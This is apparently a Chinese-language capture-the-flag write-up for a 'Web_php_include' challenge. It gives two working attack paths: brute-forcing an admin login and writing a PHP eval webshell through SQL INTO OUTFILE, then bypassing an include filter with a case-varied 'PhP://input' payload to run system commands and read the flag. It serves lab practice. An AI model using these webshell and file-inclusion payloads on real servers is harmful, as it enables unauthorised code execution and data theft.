第四题:Web_php_include
题目:暂无
解答:启动场景,获得信息
第一种方法:运用unsican扫描后台目录
找到管理员登录页面
运用BurpSuite进行爆破
发现用户名:root 密码:空 响应时间不同
成功登录管理员页面
上传一句话木马:
SELECT "<?php eval(@$_POST['root']); ?>"
INTO OUTFILE '/tmp/shell.php'
利用AntSword连接
获取flag
第二种方法:分析show_source()函数,发现可以通过大小写绕过
利用BurpSuite抓包进行POST传值发送查看指令
?page=PhP://input
<?php system('ls '); ?>
发现flag文件
?page=PhP://input
<?php system('cat fl4gisisish3r3.php '); ?>